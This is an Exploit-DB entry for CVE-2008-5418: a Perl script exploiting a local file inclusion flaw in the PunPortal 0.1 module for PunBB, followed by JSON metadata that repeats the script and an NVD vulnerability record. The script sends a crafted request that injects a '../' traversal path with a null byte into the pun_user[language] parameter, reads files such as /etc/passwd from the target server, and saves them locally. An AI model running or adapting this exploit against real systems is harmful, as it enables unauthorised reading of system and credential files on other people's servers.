ID EDB-ID:7168
Type exploitdb
Reporter StAkeR
Modified 2008-11-20T00:00:00
Description
PunBB Mod PunPortal 0.1 Local File Inclusion Exploit. CVE-2008-5418. Webapps exploit for php platform
#!/usr/bin/perl
=about
PunBB (PunPortal 0.1) Local File Inclusion Exploit
--------------------------------------------------
by athos - staker[at]hotmail[dot]it
download mod http://www.punres.org/download.php?id=1108
download cms http://punbb.org
register globals = 1
magic quotes gcp = 1
File (include/login.php)
1. <?php
2.
3. // Show login if not logged in
4. if($pun_user['is_guest'])
5. {
6. if(!isset($focus_element) || (isset($focus_element) && !in_array('login', $focus_element)))
7. {
8.
9. // Load the language files
10. require PUN_ROOT.'lang/'.$pun_user['language'].'/common.php';
11. require PUN_ROOT.'lang/'.$pun_user['language'].'/login.php';
$pun_user['is_guest'] isn't declared
$pun_user['language'] isn't declared
include/user/login.php?pun_user[is_guest]=a&pun_user[language]=../../etc/passwd%00
how to fix?use the latest version (2.0)
Usage: perl punbb.pl localhost/cms
=cut
use strict;
use warnings;
use IO::Socket;
my $html = undef;
my $site = $ARGV[0] or &help;
my @take = split /\//,$site;
my ($host,$path) = @take;
if($site =~ /http:\/\/(.+?)/i) {
print STDOUT "Invalid URL\n";
exit;
}
print STDOUT "Local File (ex: ../../etc/passwd)\n";
print STDOUT "Local File: ";
chomp(my $file = <STDIN>);
if(not defined($file)) {
print STDOUT "File Not Defined!\n";
exit;
}
my $evil = "/include/user/login.php?pun_user[is_guest]=a&pun_user[language]=";
my $sock = new IO::Socket::INET(
PeerAddr => $host,
PeerPort => 80,
Proto => 'tcp',
Timeout => 6,
) or die $!;
my $data = "GET /${path}/${evil}${file}%00 HTTP/1.1\r\n".
"Host: $host\r\n".
"User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n".
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n".
"Accept-Language: en-us,en;q=0.5\r\n".
"Accept-Encoding: gzip,deflate\r\n".
"Connection: close\r\n\r\n";
$sock->send($data);
while(<$sock>) {
$html .= $_;
}
if($html =~ /(No such file or directory|HTTP\/1.1 404 Not Found)/i) {
print STDOUT "Exploit Failed!\n";
exit;
}
else {
my $name = int(rand(999)).'.txt';
open(FILE,">",$name);
print FILE $html;
close(FILE);
print STDOUT "Exploit Successfully!\n";
print STDOUT "$name saved!\n";
exit;
}
sub help {
print STDOUT "PunBB (PunPortal 0.1) Local File Inclusion Exploit\n".
"by athos - staker[at]hotmail[dot]it\n".
"Usage: perl $0 [host/path]\n";
exit;
}
# milw0rm.com [2008-11-20]
{"hash": "e208a73eca8db343c8537ee030a4450a917f774a7a7b3e922b560a0b751cc28c", "edition": 1, "lastseen": "2016-02-01T02:34:07", "viewCount": 1, "bulletinFamily": "exploit", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "id": "EDB-ID:7168", "history": [], "enchantments": {"score": {"value": 2.1, "vector": "NONE"}, "vulnersScore": 2.1}, "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/7168/", "description": "PunBB Mod PunPortal 0.1 Local File Inclusion Exploit. CVE-2008-5418. Webapps exploit for php platform", "title": "PunBB Mod PunPortal 0.1 - Local File Inclusion Exploit", "sourceData": "#!/usr/bin/perl\n\n=about\n\n PunBB (PunPortal 0.1) Local File Inclusion Exploit\n --------------------------------------------------\n by athos - staker[at]hotmail[dot]it\n download mod http://www.punres.org/download.php?id=1108\n download cms http://punbb.org\n\n register globals = 1\n magic quotes gcp = 1\n \n \n \n File (include/login.php)\n \n 1. <?php\n 2.\n 3. // Show login if not logged in\n 4. if($pun_user['is_guest'])\n 5. {\n 6. if(!isset($focus_element) || (isset($focus_element) && !in_array('login', $focus_element)))\n 7. {\n 8. \n 9. // Load the language files\n 10. require PUN_ROOT.'lang/'.$pun_user['language'].'/common.php';\n 11. require PUN_ROOT.'lang/'.$pun_user['language'].'/login.php';\n \n \n $pun_user['is_guest'] isn't declared\n $pun_user['language'] isn't declared\n \n include/user/login.php?pun_user[is_guest]=a&pun_user[language]=../../etc/passwd%00\n \n how to fix?use the latest version (2.0) \n \n Usage: perl punbb.pl localhost/cms\n \n=cut\n\n\nuse strict;\nuse warnings;\nuse IO::Socket;\n\n\nmy $html = undef;\nmy $site = $ARGV[0] or &help;\nmy @take = split /\\//,$site;\n\nmy ($host,$path) = @take;\n\nif($site =~ /http:\\/\\/(.+?)/i) {\n print STDOUT \"Invalid URL\\n\";\n exit;\n}\n\nprint STDOUT \"Local File (ex: ../../etc/passwd)\\n\";\nprint STDOUT \"Local File: \";\n \nchomp(my $file = <STDIN>);\n\nif(not defined($file)) {\n print STDOUT \"File Not Defined!\\n\";\n exit;\n}\n\n\nmy $evil = \"/include/user/login.php?pun_user[is_guest]=a&pun_user[language]=\";\n\nmy $sock = new IO::Socket::INET(\n PeerAddr => $host,\n PeerPort => 80,\n Proto => 'tcp',\n Timeout => 6,\n ) or die $!; \n\nmy $data = \"GET /${path}/${evil}${file}%00 HTTP/1.1\\r\\n\".\n \"Host: $host\\r\\n\".\n \"User-Agent: Mozilla/4.5 [en] (Win95; U)\\r\\n\".\n \"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n\".\n \"Accept-Language: en-us,en;q=0.5\\r\\n\".\n \"Accept-Encoding: gzip,deflate\\r\\n\".\n \"Connection: close\\r\\n\\r\\n\";\n\n$sock->send($data);\n\nwhile(<$sock>) {\n $html .= $_;\n} \n\nif($html =~ /(No such file or directory|HTTP\\/1.1 404 Not Found)/i) {\n print STDOUT \"Exploit Failed!\\n\";\n exit;\n}\nelse {\n my $name = int(rand(999)).'.txt';\n \n open(FILE,\">\",$name);\n print FILE $html;\n close(FILE);\n \n print STDOUT \"Exploit Successfully!\\n\";\n print STDOUT \"$name saved!\\n\";\n exit;\n}\n\n\nsub help {\n print STDOUT \"PunBB (PunPortal 0.1) Local File Inclusion Exploit\\n\".\n \"by athos - staker[at]hotmail[dot]it\\n\".\n \"Usage: perl $0 [host/path]\\n\";\n exit;\n}\n\n# milw0rm.com [2008-11-20]\n", "objectVersion": "1.0", "cvelist": ["CVE-2008-5418"], "published": "2008-11-20T00:00:00", "href": "https://www.exploit-db.com/exploits/7168/", "osvdbidlist": ["50632"], "references": [], "reporter": "StAkeR", "modified": "2008-11-20T00:00:00"}
{"cve": [{"lastseen": "2017-09-29T14:26:14", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/46774", "https://www.exploit-db.com/exploits/7168", "http://www.securityfocus.com/bid/32380", "http://securityreason.com/securityalert/4707"], "description": "Directory traversal vulnerability in login.php in the PunPortal module before 2.0 for PunBB allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the pun_user[language] parameter.", "edition": 3, "reporter": "NVD", "published": "2008-12-10T09:00:01", "title": "CVE-2008-5418", "type": "cve", "enchantments": {"score": {"modified": "2017-09-29T14:26:14", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2008-5418"], "scanner": [], "modified": "2017-09-28T21:32:37", "cpe": ["cpe:/a:justin_roy:punportal_module:1.0"], "id": "CVE-2008-5418", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5418", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
